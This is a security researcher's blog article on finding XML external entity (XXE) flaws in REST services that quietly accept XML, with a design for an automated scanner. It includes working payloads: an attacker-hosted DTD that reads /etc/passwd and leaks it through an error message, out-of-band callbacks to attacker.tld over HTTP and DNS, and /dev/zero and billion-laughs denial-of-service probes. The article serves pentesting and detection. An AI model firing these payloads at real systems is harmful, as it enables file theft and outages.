Generic XXE Detection

In this article I present some thoughts about generic detection of XML eXternal Entity (XXE) vulnerabilities during manual pentests supplemented with some level of automated tests. The ideas in this blog post (derived from experiences of several typical and untypical XXE detections during blackbox pentests) can easily be transformed into a generic approach to fit into web vulnerability scanners and their extensions.

This is done by demonstrating an example of where service endpoints that are used in a non-XML fashion can eventually be accessed with XML as input format too, opening the attack surface for XXE attacks.

At the time of writing this article I've started to develop a Burp Extension ("Generic XXE Detector") and will eventually also transform it into a ZAP extension, letting this kind of detection approach make its way into these scanners - if I find the time to complete that.

XXE detection in service endpoints

During blackbox pentesting one often gets in front of some service endpoints (mostly REST based ones used from within single-page apps in browsers). These RESTful endpoints often offer JSON as transport format, but many server-side development frameworks (like JAX-RS for Java based RESTful services) make it very easy for developers to offer also an XML based data exchange format for input and/or output out-of-the-box. If such alternative formats exist, they can easily be triggered using proper Content-Type request header values (like text/xml or application/xml).

So the challenge is to find these endpoints which also accept XML as input format, even though the client (webpage) only uses JSON or direct path- or query-params to access the service. To scale this from a manual pentesting trick into a way of automation, the tool to scan for this needs a generic XXE detection approach, which can easily be applied to every URL the active scanner sees in its scope during a pentest.

In one very interesting case of an XXE finding inside a Java based service endpoint (during a blackbox pentest) I came across a service endpoint that only had path- and query-params as input source and responded with JSON. Basically it was even a simple GET based service (no POST there). So this didn't really look much like "let's try some XXE Kung-Fu here...". Especially the tools including Burp didn't find any XXE at this spot when actively scanning it (even with thorough scanning configured).

But after several manual tries, I managed to squeeze an XXE out of it, since it indeed was a REST service which also accepted XML out-of-the-box. I had to apply several tricks though, in order to get the XXE to work:

  • I tried to convert the request from a GET to a POST in order to also send XML as the request body. Unfortunately POST was not accepted (as the service was only mapped to GET), so I had to stick to GET requests.
  • I removed the query-params as well as path-params from the request URL in order to not let these get picked up by the service. As this was a blackbox pentest, I can only assume that removing the query-params led towards a mode of the service endpoint accepting the input also via other formats (i.e. when automatically mapped from XML input for example). Accessing the service without the used path- and query-params resulted in an error message (no input data available).
  • Even though only GET could be used, I then added the Content-Type: application/xml request header and some non-conforming invalid XML as the request body: This was rewarded with an XML error message, showing that some kind of parsing process picked up the body payload of the GET request, i.e. making it an interesting target to investigate further. Adding the path- and query-params back to the request resulted in a business error message, so that the exploit seems to require to remove them, as they might take precedence over the XML body otherwise.
As I then had a way of letting the server parse my XML and received at least replies with some technical error messages from the parser, I tried to use the XXE to exfiltrate some data (like /etc/passwd or just listing of base directory /): As the expected XML format for this kind of service call was not known to me (blackbox assessment), I had to use a more generic approach, which works even without placing the entity reference in the proper XML element. Also (as tested afterwards) when the server got the XML as expected, it didn't return any dynamic response, so only the technical error was echoed back. Of course the great out-of-band (OOB) exfiltration technique by T.Yunusov and A.Osipov would work as a generic approach to exfiltrate content in such a scenario.

But since (at least for current Java environments) this kind of URL-based OOB exfiltration only allowed to exfiltrate contents of files consisting of only one line (as CRLFs break the URL to the attacker's server), I managed to combine it with the technical error message the server replied and read the data from there:

  • The idea is to use the trick of passing the data carrying parameter entity itself into another file:/// entity in order to trigger a file-not-found exception on the second file access with the content of the first file as the name of the second file, which was thankfully echoed back completely from the server as a file-not-found exception (so pure OOB exfiltration wasn't required here):

Attacker's DTD part applying a file-not-found exception echo trick (hosted on attacker's server at http://attacker.tld/dtd-part):

<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">

Request (exploiting the XXE like in the regular OOB technique by Yunusov & Osipov):

GET /service/ HTTP/1.1
Content-Type: application/xml
Content-Length: 161

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [  
  <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >

Response (delivering the data as file-not-found error message):

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 1851
Connection: close

 - with linked exception:
[ /root:x:0:0:root:/root:/bin/bash
... ... ...
... ... ...
... ... ...
apache:x:54:54:Apache:/var/www:/sbin/nologin (No such file or directory)]

Using this file-not-found exception echo trick to read the data not only solved the "one line only" exfiltration problem, it also lifted some restrictions that existed with XXE exploitations when used directly inside the XML elements: Contents of files that contain XML special meta chars (like < or >) would break the XML structure. This is no longer a problem with the above mentioned trick.

After that all worked pretty well, I discovered that Ivan Novikov has recently blogged about some pure OOB techniques that even exfiltrate data under Java 1.7+ using the ftp:// scheme and a customized FTP server. This would have worked in the above mentioned scenario as well - even when the server does not return technical error messages, as it is a pure OOB exfiltration trick.

As a small side note: This file-not-found exception echo trick might also be used as an XSS in some cases by trying to echo <script>alert(1)</script> as the filename. Often these technical error messages might not be properly escaped when echoed back, compared to situations where non-error-messages originating from regular XML element input will be reflected. But this XSS is rather difficult to exploit in real scenarios, since it would not be easy to trigger the desired request from a victim's browser – if not even impossible depending on the http method (in this example a strange GET with request body).

Automating this as a scanning approach

Finding such an XXE vulnerability in a service endpoint using only manual pentesting tricks (as the scanners didn't detect it) made me think of a generic approach that is capable of detecting such a vulnerability automatically. Basically the scanning technique should try this on every (in-scope) request it sees, even when the request in question does not contain any XML data (as in the scenario of the RESTful service above that used mainly JSON).

So here are the ideas I came up with (which I will also prototype as a Burp and/or ZAP extension soon). The scanner should perform the following steps on every request it is allowed to scan actively. This should be done in addition to any regular XXE detections the scanner already has in place. The following technique is just intended to detect scenarios like the above mentioned:

  1. Issue the request with original path- and/or query-params and with the http POST method as well as its original http method (even GET) and place a generic DTD based payload in the request body that directly references the parameter entity, like the following: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file:///some-non-existing.file" > %xxe; ]>. Don't forget to add the Content-Type: application/xml header to the request (also try with text/xml as well).
    • If the response contains an error like the following (effectively echoing the filename back in some kind of file-not-found message), flag it as potential XXE: javax.xml.bind.UnmarshalException - with linked exception: [ /some-non-existing.file (No such file or directory)]
    • You can also compare the response content of the previous step of accessing a non-existing file with accessing a valid existing file like /etc/passwd. This might catch some differences between the error responses of non-existing files vs. existing files that do not contain valid content to place inside the DTD.
    • If it is also possible to echo in the file-not-found exception message some <script>alert(1)</script> as the filename, flag it as XSS too, but one that is difficult to exploit (and depending on the http method required eventually impossible to exploit).

  2. If the steps above didn't trigger an XXE condition, try to remove the original request's query-params and try the above steps again. Finally try to strip each path-param as well (just in case the service is picking this up also and then does not try to access input from the XML body instead) and retry step one.

  3. If the steps above didn't trigger an XXE condition, try to use the well-known OOB techniques (see the referenced links above for more details regarding these cool tricks):
    • Use a payload like the following (still having the Content-Type header set to application/xml): <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://attacker.tld/xxe/ReqNo" > %xxe; ]>, where ReqNo is replaced by a unique number for every request scanned. This unique number is required (when parsing the attacker's webserver logs) to correlate log entries with the scanned requests that should then be flagged as XXE candidates. The best results would be gained if the scanner offers some kind of drop-in where (at the end of the pentesting assignment) the observed webserver logs (of the attacker's webserver) can be given to the scanning engine for checking against the issued OOB request numbers for matches.

  4. If the steps above didn't trigger an XXE condition (eventually because the server cannot access the attacker's webserver), try to use established DNS-based OOB exfiltration techniques, where part of the domain name contains the XXE request number ReqNo from the previous step, like in the following payload: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://ReqNo.xxe.attacker.tld" > %xxe; ]>. That way at least the DNS resolution to the attacker's domain via its DNS server might be used to trigger the XXE match when after the pentest the logs of the DNS server are parsed by the scanner to correlate them with the scanned requests.

  5. If the steps above didn't trigger an XXE condition, we have to go completely blind only on sidechannels like timing measurements: This could be done by checking various internally reachable ports while measuring the response time of the payload <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "" > %xxe; ]> versus the response time of <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "" > %xxe; ]>
    • Similar checks can be performed with file:/// URLs by accessing small vs. big files. When being a risky scanner, you can try to measure the increase in response time when accessing /dev/zero as the file (eventually killing the thread on the server).
    • Also a risky scanner can try to measure the processing time of nested (non-external) expansions like in the "billion laughs attack".

Note that in the above scenarios the concrete XML format does not need to be known to the scanner, so it can easily apply this scanning technique on requests even when they haven't used any XML during passive observations. All XML payloads are completely self-contained within the DTD section. The idea is to issue this kind of scan on every request to automatically identify places where service endpoints or alike also offer to be accessed using XML, as is the case with some RESTful development frameworks.

Some of the XML DTD payloads above (those using the OOB requests to detect XXE either by inspecting the attacker's webserver logs or measuring the timing differences) can even be shortened to a pure external DTD approach like this: <!DOCTYPE test SYSTEM "http://attacker.tld/xxe/ReqNo"> or <!DOCTYPE test SYSTEM "file:///dev/zero">. But the longer tests presented above give more confidence to the XXE finding, since the shorter version only validates that external DTDs and not entities can be loaded.